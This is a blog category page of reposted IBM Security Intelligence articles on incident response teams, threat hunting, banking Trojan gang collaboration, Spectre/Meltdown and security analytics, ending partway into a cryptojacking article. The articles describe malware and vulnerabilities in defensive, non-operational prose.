Browsing category

Threat Intelligence

Forrester Research, IBM X-Force Command Center, IBM X-Force Incident Response and Intelligence Services (IRIS), Incident Management, Incident Response, Incident Response (IR), Incident Response Plan, Security Leaders, Security Leadership, Security Professionals, Security Training, Threat Intelligence,

5 Characteristics of an Effective Incident Response Team: Lessons From the Front Line

How you respond to a data breach matters.

In today’s world, most companies have documented policies and technologies that can help prepare them for grappling with a cyber intruder, but in many cases those tactics are insufficient — focusing more on answering questions about the incident itself and less about an integrated response that protects reputation, the business and, most importantly, clients.

A breach can be damaging, and the inability to respond effectively can add even more self-inflicted damage. The good news is, while you can’t control whether or not you’re a target of a breach, you can control how — and how well — you respond.

Leading organizations that analyze business trends have taken note of the importance of an integrated response. Earlier this week, Forrester released “The Forrester Wave: Cybersecurity Incident Response Services, Q1 2019.” This report encourages customers to look for providers that can ensure timely preparation and breach response. Some characteristics highlighted in the report include vendors that have cyber range capabilities to train employees in the event of an attack and provide thorough deliverables to help beyond postmortem of the incident.

Forrester evaluated 15 incident response (IR) service providers and weighed them across 11 criteria. These vendors were identified, evaluated, researched, analyzed and scored. The Forrester Wave report shows how each provider measures up and helps security and risk professionals make the right choice. Forrester noted that IBM “is a strong choice for training and incident preparation services” and that it “attaches X-Force threat intelligence analysts to its IR teams to ensure full situational awareness across the investigation.”

The IBM X-Force Incident Response and Intelligence Services (IRIS) team was created in 2016 and launched alongside the X-Force Command Cyber Range in Cambridge, Massachusetts. We knew that pairing a strong IR team with an immersive range experience that tests skills to survive the inevitable would greatly increase the success our clients experience in the event of a breach.

5 Characteristics of an Elite IT Team

As leaders of the X-Force IRIS team, we’ve been on the front line of hundreds of security breaches and built a team of elite practitioners that help clients recover quickly and effectively in the wake of an attack. Here are the top five characteristics of a world-class response team, based on our experience.

1. It Starts With People

One of the things we often say is, “IR is a team sport.” And with any team, it’s important to make sure each player has a unique set of skills that, when combined with the rest, compose a formidable force against your opponent.

The right team with the right skills means you solve problems faster, build more creative solutions to challenges, and have diverse insight and perspective on situations that allows you to view the problem from a variety of angles. That’s important, because often the attackers have assembled teams of skilled individuals that represent different experiences and perspectives themselves, so constructing an internal team in a similar manner enables you to quickly identify tactics and anticipate the next move.

2. Great Technology, Dynamic Analysis

When you’re technology agnostic, you can go beyond the tools available in your backyard and better ensure you’re getting the right capabilities to achieve your objective. We’ve learned that when we’re not tied to a specific technology or limited to one analytical methodology, we can rapidly evolve our approach to swiftly detect an attacker’s ever-shifting activity.

3. Embedded Threat Intelligence Capabilities

For every case we open, we embed an intelligence analyst who stays involved from start to finish. They bring a consistent intel perspective to each case, augmenting their own skills by leveraging unique insights from the larger intelligence team. Their combined insight gives us exceptional views into an adversary’s actions, tools and methodologies. Understanding these aspects allows faster, more accurate mitigation actions.

4. Comprehensive Remediation

There are two important focus areas for remediation: tactical and strategic. The tactical emphasizes removing an attacker and their access from the victim environment, and the strategic centers on ensuring that same type of attack is not successful again. They both matter, because getting an intruder out quickly and making sure you’re not vulnerable to the same kind of exploitation keeps you safer.

But there’s an element that goes beyond the tactical and the strategic: rebuilding an environment that’s been destroyed as the result of an attack. Rebuilding an environment requires a set of precision skills and, often, a great deal of human resources to ensure it’s done quickly, accurately, and in a way that enables you to continue to operate while rebuilding and recovery take place.

We built the X-Force IRIS team with a set of practitioners that, together, represent thousands of hours of experience rebuilding devastated environments from the ground up. That means when a client has been ravaged by an attack, it can rely on us to not only help it remediate, but keep its business running while we rebuild anew.

5. Train Like You Fight, Fight Like You Train

Even the best IR plan is insufficient if you don’t practice it. We encourage clients to run battle drills on their IR plans (and even put our own to the test). While tabletop exercises can be informative, by far the best way to train for a cyber breach is through an immersive, instructor-led range experience.

We combine our IR expertise with the X-Force Command Cyber Range. Here, we immerse clients in a highly gamified scenario that tests not only their IR plan, but also their human abilities to respond and adapt in a crisis. This helps uncover gaps in existing processes and silos in an organization and develop ways to respond to a breach in an integrated fashion that can’t be replicated in any other way.

Competitive Collaboration

Leaders named in the Forrester Wave — such as FireEye, CrowdStrike and Deloitte — are proving that effective incident response is worth the investment. And as competitors, we have the opportunity to share information and create a more robust collective defense for our clients when possible. We are enthusiastic about opportunities like this that allow us to share and build knowledge, because when cybersecurity is implemented correctly, it enables transformation and business growth regardless of the competitive landscape.

The X-Force IRIS team’s investigative and analytical methodology will continue to adapt to meet future IR challenges. By combining cutting-edge methodology with new technologies across disjointed security layers, we envision that our clients will get the context they need to eliminate the noise and identify the most critical threats so they can get can back to what matters most: their core business.

Download the report

The post 5 Characteristics of an Effective Incident Response Team: Lessons From the Front Line appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Ahmed Saleh

Cyberthreats, RSA Conference, Security Conferences, Security Information and Event Management (SIEM), Security Solutions, Threat Detection, threat hunting, Threat Intelligence, Threat Prevention, Threat Protection,

Hunting for the True Meaning of Threat Hunting at RSAC 2019

After my first-ever RSA Conference experience, I returned to Boston with a lot of takeaways — not to mention a week’s worth of new socks, thanks to generous vendors that had a more functional swag approach than most. I spent the majority of my time at RSAC 2019 at the Master Threat Hunting kiosk within the broader IBM Security booth, where I told anyone who wanted to listen about how we use methodologies and tools from the military and intelligence communities to fight cyberthreats in the private sector. When I wasn’t at the booth, I was scouring the show floor on a hunt of my own — a hunt for the true meaning of threat hunting.

Don’t Believe the Hype: 3 Common Misconceptions About Threat Hunting

At first glance, the results of my hunt seemed promising; I saw the term “threat hunting” plastered all over many of the vendors’ booths. Wanting to learn more, I spoke with the booth personnel about their threat hunting solutions, gathered a stack of marketing one-pagers and continued on my separate hunt for free socks and stress balls.

After digesting the information from booth staff and digging into the marketing materials from the myriad vendors, I was saddened to learn that threat hunting is becoming a full-blown buzzword.

Let’s be honest: “Threat hunting” certainly has a cool ring to it that draws people in and makes them want to learn more. However, it’s important not to lose sight of the fact that threat hunting is an actual approach to cyber investigations that has been around since long before marketers starting using it as a hook.

Below are three of the most notable misconceptions about threat hunting I witnessed as I prowled around the show floor at RSAC 2019.

1. Threat Hunting Should Be Fully Automated

In general, automation is great; I love automating parts of my life to save time and to make things easier. However, there are some things that can’t be fully automated — or shouldn’t be, at least not yet. Threat hunting is one of those things.

While automation can be used within various threat hunting tools, it is still a very manual, human-led process to proactively (and reactively) hunt for unknown threats in your network that may have avoided your rules-based detection solutions. Threat hunting methodologies were derived from the counterterrorism community and repurposed for cybersecurity. There’s a reason why we don’t fully automate counterterrorism analysis, and the same applies to cyber.

2. Threat Hunting and EDR Are One and the Same

This was the most common misconception I encountered while searching for threat hunting solutions at RSAC. It went something like this: I would go into a booth, ask to learn more about the vendor’s threat hunting solution and come to find that what’s actually being marketed is an endpoint detection and response (EDR) solution.

EDR is a crucial piece of threat hunting, but these products are not the only tools threat hunters use. If threat hunting was as easy as using an EDR solution to find threats, we would have a much higher success rate. The truth is that EDR solutions need to be coupled with other tools, such as threat intelligence, open-source intelligence (OSINT) and network data, and brought together in a common platform to visualize anomalies and trends in the data.

3. Threat Hunting Is Overly Complicated

All of the marketing and buzz around threat hunting has overcomplicated what it actually is. It’s not one tool, it’s not automated, it’s not an overly complicated process. It takes multiple tools and a ton of data, it is very much dependent on well-trained analysts that know what they’re looking for, and it is an investigative process just like counterterrorism and law enforcement investigations. Since cyber threat hunting mirrors these investigative techniques, threat hunters should look toward trusted tools from the national security and law enforcement sectors.

What Is the True Meaning of Cyber Threat Hunting?

Don’t get me wrong — I am thrilled that threat hunting is gaining steam and vendors are coming up with innovative solutions to contribute to the definition of threat hunting. As a former analyst, I define threat hunting as an in-depth, human-led, investigative process to discover threats to an organization. My definition may vary from most when it comes to how this is conducted, since most definitions emphasize that threat hunting is a totally proactive approach. While I absolutely agree with the importance of proactivity, there aren’t many organizations that can take a solely proactive approach to threat hunting due to constraints related to budget, training and time.

While not ideal, there is a way to hunt reactively, which is often more realistic for small and midsize organizations. For example, you could conduct a more in-depth cyber investigation to get the context around a cyber incident or alert. Some would argue that’s just incident response, not threat hunting — but it turns into threat hunting when an analyst takes an all-source intelligence approach to enrich their investigation with external sources, such as threat intelligence and social media, and other internal sources of data. This approach can show the who, what, where, when and how around the incident and inform leadership on how to take the best action. The context can be used to retrain the rules-based systems and build investigative baselines for future analysis.

The Definition of Threat Hunting Is Evolving

Cyber threat hunting tools come in all shapes and sizes, but the most advanced tools allow you to reactively and proactively investigate threats by bringing all your internal and external data into one platform. By fusing internal security information and event management (SIEM) data, internal records, access logs and more with external data feeds, cyber threat hunters can identify trends and anomalies in the data and turn it into actionable intelligence to address threats in the network and proactively thwart ones that haven’t hit yet.

Behind the buzz and momentum from RSAC 2019, threat hunting will continue to gain traction, more advanced solutions will be developed, and organizations will be able to hunt down threats more efficiently and effectively. I’m excited to see how the definition evolves in the near future — as long as the cyber threat hunting roots stay strong.

Read the “SANS 2018 Threat Hunting Results” report

The post Hunting for the True Meaning of Threat Hunting at RSAC 2019 appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Jake Munroe

Advanced Persistent Threat (APT), Banking Trojan, Cybercrime, Cybercrime Trends, Cybercriminals, DRIDEX, Gozi, IBM X-Force Research, Malware, Malware analysis, Ramnit, Ransomware, Threat Intelligence, Trickbot, X-Force,

The Business of Organized Cybercrime: Rising Intergang Collaboration in 2018

Banking Trojans and the gangs that operate them continue to plague banks, individuals and organizations with fraudulent transactions facilitated by malware and social engineering schemes. At last check, cybercrime cost the global economy more than $600 billion in 2017 , and forecasts for 2018 predicted $1.5 trillion in losses.

No matter how you turn these numbers, they are a burden that keeps growing and encouraging a rife, complex industry of online crime.

Going Behind the Numbers of the ‘IBM X-Force Threat Intelligence Index’

Every year, increasingly organized cybercrime gangs shuffle their tactics, techniques and procedures (TTPs) to evade security controls on the micro level and law enforcement on the macro level. Behind each malware named on the top 10 chart below, codes are distributed and operated differently and focus on different parts of the globe. The chart is populated by organized cybercrime gangs that have ties to yet other cybercrime gangs, each doing its part to feed the perpetual supply chain of a digital financial crime economy.

In cybercrime, it can be said that the more things change, the more things stay the same. In 2018, however, I must admit I was finally surprised when two malware gangs that did not appear connected at first began openly collaborating. It thus became clearer than ever that the banking Trojan arena is dominated by groups from the same part of the world, by people who know each other and collaborate to orchestrate high-volume wire fraud.

To learn more about the malware that shaped 2018, let’s begin by looking at the top constituents of the gang-owned Trojan chart and drill down on information gathered by IBM Security for the top three.

Top Trojan Chart 2018 - IBM Security Research

Figure 1: Top 10 chart of the most active banking Trojan families in 2018 (source: IBM X-Force)

1. TrickBot

TrickBot, a banking Trojan operated by a Russia-based threat group, was one of the most aggressive Trojans of 2018. It targets banks across the globe with URL-heavy configurations that often include a large number of targeted bank brands from across the globe.

TrickBot’s operators focus on business banking and high-value accounts that are held with private banking and wealth management firms, but they also diversified in 2018 to include various e-commerce and cryptocurrency exchange platforms on their target lists.

According to IBM X-Force data that was gathered since TrickBot’s rise, no other financial Trojan is as consistently active in terms of infection campaigns and deployment of redirection attacks, indicating that its operators have ample resources and connections to develop and operate the malware in different parts of the world. Despite this overall capability, X-Force saw TrickBot sharpening its focus in 2018 and targeting a handful of countries in each campaign, keeping major economies such as the U.K. and the U.S. on almost every target list.

Intergang Collaboration With IcedID

Some of the trends in TrickBot’s activity in 2018 included collaboration with another banking Trojan, IcedID, which IBM X-Force discovered in September 2017, as well as operating the Ryuk ransomware, a subset of TrickBot’s botnet monetization strategy. These highlight a larger trend of intergang collaboration among Trojan operators striving to generate larger profits in spite of growing security control sophistication.

At first, TrickBot and IcedID appeared unrelated. But about eight months into IcedID’s existence, signs of a link between the two became apparent. In May 2018, X-Force researchers observed TrickBot dropping IcedID, whereas it had previously been dropped primarily by the Emotet Trojan, the same distributor that also drops TrickBot in different campaigns.

By August 2018, our researchers noted that IcedID had been upgraded to behave in a similar way to the TrickBot Trojan in terms of its deployment. The binary file was modified to become smaller and no longer featured embedded modules. The malware’s plugins were being fetched and loaded on demand after the Trojan was installed on infected devices. These changes made IcedID stealthier, modular and more similar to TrickBot.

In addition to its increased stealth level, IcedID also started encrypting its binary file content by obfuscating file names associated with its deployment on the endpoint. Also similar to TrickBot is IcedID’s event objects, which coordinate multiple threads of execution in Windows-based operating systems. IcedID began using named events to synchronize the execution between its core binary and the plugins selected for loading. When a plugin was called upon, it was fetched by its ID number from the attacker’s server and, when loaded, assigned a unique ID.

Although malware authors do sometimes copy from one another, our research indicates these modifications were not coincidental. Even if we only looked at the fact that TrickBot and IcedID fetch one another into infected devices, that would be indication enough that these Trojans are operated by teams that work together.

Longtime Partners?

Ties between TrickBot and IcedID may have started years ago in a collaboration designed to help both groups maximize their illicit operations and profits. During the six-year activity phase of the Neverquest (aka Catch or Vawtrak) Trojan, it collaborated with the Dyre group to deliver Dyre malware to devices already infected with Neverquest.

The original Dyre group partly disbanded in late 2015, followed by the rise of TrickBot, which is believed to be the successor to Dyre. Neverquest halted operations following the arrest of one of its key members in 2016, after which the IcedID Trojan appeared. With the two featuring advanced capabilities and evident cybercrime connections with other gangs, their current-day collaboration likely started years ago.

The TrickBot-Ryuk Connection

Another TrickBot trend that started in 2018 is a connection with ransomware. Reminiscent of the Dridex Trojan’s links to the Locky and then BitPaymer ransomware, TrickBot began dropping ransomware called Ryuk. Unlike wide-cast nets that spread ransomware to as many email recipients as possible, Ryuk, like BitPaymer, is spread in targeted campaigns where attackers go through the typical advanced persistent threat (APT) kill chain and manually breach the network.

Ryuk attackers often go through reconnaissance stages, looking for valuable data to hijack. The goal: Infect established organizations with Ryuk and then demand large sums in ransom payments that average hundreds of thousands of dollars each.

Malware drop killchain

Figure 2: Ryuk campaigns — a four-step routine to drop three different Trojans to target devices (source: IBM X-Force)

Upon investigating Ryuk’s code, it quickly became apparent that this ransomware was not entirely new. Ryuk closely resembles the Hermes ransomware that was linked with malicious activity by a nation-state-sponsored group called Lazarus (aka Hidden Cobra).

Is Ryuk connected to Hermes? That’s one possibility. It could also be that some Lazarus members collaborate with banking Trojan operators through cross-border partnerships to steal and launder large amounts of cybercrime money via Eastern Europe and Asia, or that someone with access to the Hermes code reused it to create Ryuk.

Whatever the source of Ryuk, it shows that TrickBot’s operators are diversifying their nefarious activity, continuing to focus heavily on the business sector and launching targeted attacks that press organizations to pay.

Major Trojans collaborate

Figure 3: Collaboration between major malware gangs (source: IBM X-Force)

TrickBot TTPs and Evolution

In terms of its TTPs, TrickBot’s operators focus their efforts on businesses and, therefore, opt for distribution through booby-trapped productivity files and fake bank websites. After infection, TrickBot modules allow it to spread laterally in compromised networks and infect additional users.

TrickBot continues to use both server-side injections deployed on the fly from its attack server and redirection attacks hosted on its servers to hijack users and present them with a fake replica of their bank’s website.

In 2018, TrickBot’s developers added three new functions to the malware, facilitating the theft of Remote Desktop Protocol (RDP) credentials, Virtual Network Computing (VNC) credentials and PuTTY open-source terminal emulator credentials. It steals Windows system reliability and performance data and features a new mechanism for storing its configuration and elliptic curve cryptography (ECC) public keys.

The TrickBot botnet is supported by what’s considered a mature infrastructure, where some campaigns featured 2,458 unique command-and-control (C&C) IP addresses used in 493 main configuration releases across 276 versions — all in one week.

X-Force expects to see TrickBot maintain its position on the global malware chart unless it is interrupted by law enforcement in 2019.

2. Gozi

Gozi (aka Ursnif) has been highly active in the wild for more than a decade now, a rare occurrence in the cybercrime arena. The malware was first discovered in 2007, when it was operated by a closed group of developers and cybercriminals. At the time, it was used to target online banking users mostly in English-speaking countries.

Throughout the years, Gozi has gone through almost every phase a banking Trojan can go through. Its code was leaked in 2010, giving rise to other Trojans, such as Neverquest, that also dominated the cybercrime charts for years after. It was used in the Gozi-Prinimalka ordeal in 2012 and, in 2013, was fitted with a master boot record (MBR) rootkit to create high persistence through a computer’s MBR.

In 2016, X-Force reported about the rise of the GozNym hybrid, a two-headed beast spawned from the Nymaim malware and embedded with the Gozi financial fraud module. Starting in 2017, X-Force researchers reported that a new variation of Gozi was being tested in Australia: Gozi v3. The malware was based on the same code of the original Gozi ISFB but featured some modifications on the code injection level and attack tactics.

In 2018, Gozi v2 was the second-most active Trojan in the wild, working across the globe and in Japan. V2 is operated separately from the v3 version that continues to target banks in the Australia-New Zealand region. The malware is operated in a cybercrime-as-a-service model that allows different cybercriminals to use the botnet to conduct fraud.

To reach new victims, Gozi is distributed in document and spreadsheet attachments that prompt the user to enable macros. In recent campaigns, when the user complies, the macro runs the WMI Provider Host process (wmiprvse) to execute a malicious PowerShell script. The script is designed to fetch the payload and uses string concatenation to evade detection.

Recently, in the case of attack schemes against banks in Europe, Gozi delivered custom-tailored client-side code for each targeted bank brand users accessed, likening its tactics to redirection attacks in which each brand is targeted in a specific way.

Gozi’s distributors use malicious websites to host their resources but check the target device’s Geo IP to reduce the potential of exposure. If either Russian or Chinese keyboard settings are detected during its installation, the deployment ends.

This malware has been part of the top-most constituents of the global malware chart for the past five years, and X-Force expects to see this longtime staple of the organized cybercrime arena maintain its position on the chart in 2019.

3. Ramnit

Ramnit is a prolific banking Trojan that has been active in the wild since 2010. Ramnit started out as a self-replicating worm, leveraging removable drives and network shares to spread to new endpoints. As the project evolved, Ramnit morphed into a modular banking Trojan and started spreading via popular exploit kits such as Angler and RIG.

Although it was one of the most prominent Trojans between 2011 and 2014, Ramnit was targeted by law enforcement in 2015. While it was one of the only botnets to ever survive a coordinated disruption, its operators have not returned to the same level of activity since. In recent years, Ramnit has been an on-again-off-again operation, seeing long lulls in its cybercrime activity and narrowing its attack turf over time to focus mostly on the U.K., Canada and Japan.

2018: Reemergence and Intergang Collaboration

In 2018, the Ramnit Trojan returned to the cybercrime arena with revamped code and a new partner, a proxy malware known as Ngioweb. Ramnit’s developer modified its financial module to enhance its capabilities and changed the internal module’s name from “Demetra” to “Camellia.”

Ramnit’s 2018 comeback resulted in a reported infection of more than 100,000 devices within the span of two months, as part of an operation code-named “Black.” In this campaign, Ramnit went back to its worm roots and was used as a first-stage infection in a kill chain designed to amass a large proxy botnet for Ngioweb.

How good was this new partnership for Ramnit? We can only assume that it was used to create a massive proxy botnet that would resemble the Gameover Zeus botnet in its architecture. The Black campaign was short-lived, and by the end of 2018, Ramnit was linked with Emotet, Dridex and BitPaymer for using the same dropper as those Trojans and being used itself as a dropper for Dridex.

TTPs

Configuration and code comments show that Ramnit is probably being developed by new team members. Configuration injects were modified to Lua programming and, in many cases, came bugged or unsophisticated. This was not the case for this malware in past years.

For its deployment routine, Ramnit began leveraging code that relies on PowerShell scripts in what’s known as reflective PE injection. Its modules are not pulled from a remote server but come packed with the core malware, and its reliance on a domain generation algorithm (DGA) has been modified to include hardcoded domains.

Will we continue to see Ramnit in 2019? X-Force researchers expect to see the same activity pattern for this malware with its come-and-go nature in Japan and Europe. Ramnit will likely drop from its current rank on the global Trojan chart and be overtaken by IcedID and newcomers like BackSwap and DanaBot.

Threat Landscape Staples

Banking Trojans have been a burdensome part of the cybercrime threat landscape for more than a decade now. The past five years have shown us that this breed of attackers is only becoming more sophisticated over time, incorporating technical knowledge with advance social engineering to focus schemes on victims that can yield the biggest profits: businesses, cryptocurrency and high-value individuals.

While previous years saw gangs operate as adversaries, occupy different turfs and even attack each other’s malware, our research from 2018 connected the major cybercrime gangs together in explicit collaboration. This trend is a negative sign that highlights how botnet operators join forces, revealing the resilience factor in these nefarious operations.

While it can be hard to detect this type of evolving malware, it’s possible to stop banking Trojans before they make it into your device or your organization. Proper security controls and user education, as well as planned incident response, can help keep this threat at bay and contain its detrimental effects if ever an account is taken over and robbed by highly experienced criminals.

To learn more about the top security threats of 2018 and what 2019 may have in store, download the “IBM X-Force Threat Intelligence Index.” Check out page 30 in the report for our expert team’s tips on mitigating threats and increasing preparedness for a possible breach.

Read the full “IBM X-Force Threat Intelligence Index”

The post The Business of Organized Cybercrime: Rising Intergang Collaboration in 2018 appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Limor Kessem

Advanced Threats, IBM X-Force Incident Response and Intelligence Services (IRIS), IBM X-Force Research, Threat Intelligence, Vulnerabilities, Vulnerability Management,

Spectre, Meltdown and More: What You Need to Know About Hardware Vulnerabilities

The “2019 IBM X-Force Threat Intelligence Index” highlighted a paradigm shift sparked by a new era of hardware security challenges. The exposure of critical hardware vulnerabilities that affected almost every endpoint built in the past 20 years forced enterprises and the security community to rethink the way they approach hardware security and its impact on the business.

Since the release of the Spectre/Meltdown vulnerabilities in January 2018, researchers have been uncovering new potential impacts while threat actors search for ways to exploit these significant hardware vulnerabilities and launch attacks on affected systems. The benefits of determining valid attack vectors are significant, since many organizations have struggled to effectively address Spectre and Meltdown.

Based on interest displayed in dark web forums and underground marketplaces, IBM X-Force Incident Response and Intelligence Services (IRIS) assessed that threat actors will continue to search for ways to leverage Spectre, Meltdown and other hardware vulnerabilities to steal data in the coming years. Security teams must continue to monitor this space for new research and vendor patches to minimize detrimental effects to their business.

The Paradigm Shift Catalyst: Spectre and Meltdown

In January 2018, researchers debuted three variants of critical hardware vulnerabilities affecting most popular processor chips released since the 1990s, naming them Spectre and Meltdown (two of the three variants were lumped under the name “Spectre,” and the remaining variant was called “Meltdown”).

Spectre and Meltdown leverage “speculative execution” to gain access to sensitive data that would otherwise reside in a device’s protected memory. Modern processor chips not only process the commands programs give them, but also attempt to preemptively process possible outcomes. By preprocessing possible decision paths, processors are able to send back solutions more quickly and thereby increase processing speeds significantly. Once a decision path is chosen, the processor usually ignores any other preemptively processed possibility. This discarded path is the key to speculative execution. Spectre and Meltdown leverage this discarded path to gain access to data that should otherwise be protected by security controls. Meltdown allows an attacker to gain access to “protected data” from anywhere on a machine — “melting” security boundaries, if you will — whereas Spectre is limited to revealing protected data from the same program.

This sounds a lot like a standard privilege escalation bug, so why are these vulnerabilities such a big deal? Securely coded applications rely on a number of assumptions, one of which is that protected data remains separate from other data. As a result, securely coded applications suddenly found themselves insecure because the rules had changed.

On top of this issue, patching Spectre and Meltdown initially proved to be difficult because early patches led to possible system failure on Windows machines. Finally, Spectre/Meltdown weren’t easily detected by static security controls or basic patching scans since the issue was below the operating system level, making the attempted exploitation of these vulnerabilities tough to observe. These elements combined made Spectre/Meltdown worrisome threats to reckon with upon release to the public.

Dark Web Research Reveals Continued Threat Actor Interest

Since information about these vulnerabilities was initially released, researchers have been working to discover new, similar ones. In November 2018, researchers from a number of universities published seven new Spectre/Meltdown variants using slightly altered parameters and techniques. Multiple other researchers have vowed to keep investigating other variants to take advantage of the same underlying flaws. In 2019, IBM research released two more variants of these flaws.

While researchers have been looking for new ways to exploit Spectre, Meltdown and similar vulnerabilities for the purpose of understanding them better and devising protection mechanisms, threat actors have been watching the advancements with bated breath, knowing that many users and even organizations delay patching or applying workarounds to production environments. Meanwhile, since January 2018, IBM X-Force has observed a large number of posts across criminal underground venues inquiring about Spectre/Meltdown and seeking additional information on how to determine whether a system is vulnerable as well as active ways to exploit these vulnerabilities.

Why Aren’t We Seeing Active Exploitation at Scale?

Given the clear threat actor interest in Spectre, Meltdown and similar hardware vulnerabilities, you might ask why we did not see more malicious activity attempting to exploit them in the past year. There are numerous possible explanations, some of which are listed below.

  • Most threat actors may not know how to leverage Spectre/Meltdown. These vulnerabilities are highly technical, requiring a threat actor to have a deep understanding of hardware processing to effectively leverage them.
  • Threat actors may not be motivated to create exploit code if they don’t already have a way to monetize the vulnerabilities. Spectre/Meltdown can be challenging to use in targeting specific data and often return a very limited subset of data from the flawed device. This data could be useful, but it is often too specific and wouldn’t provide a threat actor with something they could turn around and sell quickly. If there is little opportunity to make a fast profit, most financially motivated actors will choose to invest their time and research into weaponizing other vulnerabilities.
  • Threat actors have figured out how to use Spectre and Meltdown but are finding too many already-patched systems. Given the high-profile nature of the Spectre/Meltdown release, many organizations may have already fixed the flaws, which can deter threat actors from investing too heavily into leveraging these vulnerabilities in environments they would consider lucrative enough to begin with.
  • Threat actors could be leveraging Spectre/Meltdown, but current sensors are not observing the attempts. This collection gap might occur due to limitations on endpoint sensors that only look at threats at the operating system level and above, while these vulnerabilities occur at the hardware level.

In all likelihood, all of the above answers are, to some extent, correct. However, the first two are likely only temporary roadblocks. Given enough time, more threat actors are likely to figure out how to weaponize Spectre/Meltdown and, eventually, monetize its output effectively. Once a few actors figure it out, it might only take one leak of a working exploitation code or Spectre/Meltdown-leveraging tool in underground forums to open up these vulnerabilities for actors of any sophistication level to use.

Keys to Mitigation: Patching and Threat Intelligence

Hardware vulnerabilities are an issue that the security industry is only starting to see at scale, and we are only likely to encounter more of these in the future. Since these types of flaws can affect an extremely large population of devices on a global scale, it is all that much more important to keep an eye on them, prioritize them properly and patch promptly.

When Spectre/Meltdown were reported, vendors released a series of patches to mitigate potential impacts. However, patch fixes are still a work in progress, with some patches potentially reducing performance on Linux-based systems by double-digit percentages. Despite these issues, patching systems containing critical or highly sensitive data is still the best available solution until processor manufacturers issue hardware-level fixes.

Organizations should be sure to back up critical data prior to patch installation, ask vendors for best practices in patch application, test the patch first and be prepared to revert to prior builds if patches lead to unsustainable performance reduction.

Since Spectre and Meltdown require local access for exploitation, organizations should continue to focus on preventing threat actors from gaining a foothold in their network. By restricting remote execution and unauthorized access, organizations can do more to prevent threat actors from leveraging Spectre/Meltdown.

Most importantly, continue monitoring threat intelligence feeds for information about new hardware vulnerabilities. Open-source reporting often sensationalizes threats, but a good threat intelligence vendor will provide the nuances and explain the observed usage of a vulnerability (or lack thereof) by threat actors. Though hardware vulnerabilities will undoubtedly be an area of interest for threat actors in years to come, threat intelligence can help your team understand whether threat actors are actually capable of using a vulnerability that’s relevant to your organization and whether its use has already been observed in the wild.

Finally, a great way to stay one step ahead of threat actors is to conduct hardware penetration testing, especially when current-day flaws affect legacy systems that are hard to scan for issues and sometimes hard to patch. Plan periodic testing to examine exposure to vulnerabilities that could negatively affect your infrastructure and gain insight into aligning security controls to have vulnerable assets patched or covered.

The post Spectre, Meltdown and More: What You Need to Know About Hardware Vulnerabilities appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Charles DeBeck

IBM Security, Security Analytics, Security Information and Event Management (SIEM), Security Intelligence, Security Intelligence & Analytics, Security Leaders, Security Leadership, Security Operations Center (SOC), Security Professionals, Threat Detection, Threat Intelligence,

Follow the Leaders: 7 Tried-and-True Tips to Get the Most Out of Your Security Analytics

The practice of analyzing security data for detection and response — otherwise known as security analytics (SA) — comes in many forms and flavors. Consumed data varies from organization to organization, analytic processes span a plethora of algorithms and outputs can serve many use cases within a security team.

In early 2019, IBM Security commissioned a survey to better understand how companies currently use security analytics, identify key drivers and uncover some of the net benefits security decision-makers have experienced. The findings were drawn from more than 250 interviews with information security decision-makers around the globe.

7 Lessons From Top Performers in Security Analytics

Encouragingly, the study revealed rising levels of maturity when it comes to security analytics. Roughly 15 percent of all interviewees scored as high performers, meaning their investigation processes are well-defined and they continuously measure the effectiveness of the output. These respondents are especially strong in terms of volume of investigations (five to 10 times more investigations than the average) and false positives (approximately 30 percent below average). Meanwhile, 97 percent of these leaders successfully built a 24/7 security operations center (SOC) with a total staffing headcount between 25 and 50.

What lessons can organizations with lower levels of SA maturity take away from this shining example? Below are seven key lessons security teams can learn from the top performers identified in the survey:

  1. Top SA performers have a knack for integrating security data. While many mid-performing organizations struggle with this integration and consider the task an obstacle to effective security analytics, leaders identified in the survey have streamlined the process, freeing them to focus on use case and content development.
  2. Nine in 10 high performers have an accurate inventory of users and assets — in other words, they understand the enterprise’s boundaries and potential attack surfaces and continuously update their inventory. This is likely a result of effective, automated discovery using a combination of collected security data and active scanning. By comparison, less than 30 percent of low-performing security teams practice this approach.
  3. A robust detection arsenal contains an equal mix of rule-based matching (i.e., indicators of compromise), statistical modeling (i.e., baselining) and machine learning. In stark contrast, intermediate performers rely more on existing threat intelligence as a primary detection method.
  4. Top performers use content provided by their security analytics vendors. In fact, 80 percent of respondents in this category indicated that the vendor-provided content is sufficient, whether sourced out of the box or via services engagements.
  5. Compared to middling performers, top performers dedicate between two and three times more resources to tuning detection tools and algorithms. To be exact, 41 percent of high performers spend 40 hours or more per week on detection tuning.
  6. High-performing security teams automate the output of the analytics and prioritize alerts based on asset and threat criticality. They also have automated investigation playbooks linked to specific alerts.
  7. Finally, organizations with a high level of SA maturity continuously measure their output and understand the importance of time. Approximately 70 percent of top performers keep track of monthly metrics such as time to respond and time spent on investigation. Low-performing organizations, on the other hand, measure the volume of alerts, and their use of time-based metrics is 60 to 70 percent lower than that of high performers.

Build a Faster, More Proactive and More Transparent SOC

So what do the high performers identified in the survey have to show for their security analytics success? For one thing, they all enjoy superb visibility into the performance of their SOC. While many companies are improving, particularly in the areas of cloud and endpoint visibility, 41 percent of leaders in security analytics claim to have full SOC visibility, compared to 13 percent of intermediate and low performers.

In addition, while lower-performing organizations leverage security analytics to investigate and respond — i.e., react — to threats, high performers use SA to stay ahead of threats proactively. Finally, the leaders identified in the study generate their own threat intelligence and are experts in analyzing security data.

The key takeaway here is that security is a race against time — specifically, to outpace cyber adversaries. Leading security teams know this, which is why they continuously challenge themselves by integrating new data, extracting new insights, implementing smart automation, and, most importantly, measuring the time to detect, investigate and respond.

The post Follow the Leaders: 7 Tried-and-True Tips to Get the Most Out of Your Security Analytics appeared first on Security Intelligence.

This post appeared first on Security Intelligence
Author: Bart Lenaerts

cryptocurrency, cryptocurrency miner, IBM Security, IBM X-Force Incident Response and Intelligence Services (IRIS), IBM X-Force Research, Incident Response (IR), Ransomware, Skills Gap, threat hunting, Threat Intelligence, X-Force,

Cryptojacking Rises 450 Percent as Cybercriminals Pivot From Ransomware to Stealthier Attacks

Cybercriminals made a lot of noise in 2017 with ransomware attacks like WannaCry and NotPetya, using an in-your-face approach to cyberattacks that netted them millions of dollars from victims. But new research from IBM X-Force, the threat intelligence, research and incident response arm of IBM Security, revealed that 2018 saw a rapid decline in ransomware attacks as cybercrime gangs shifted tactics to remain under the radar.

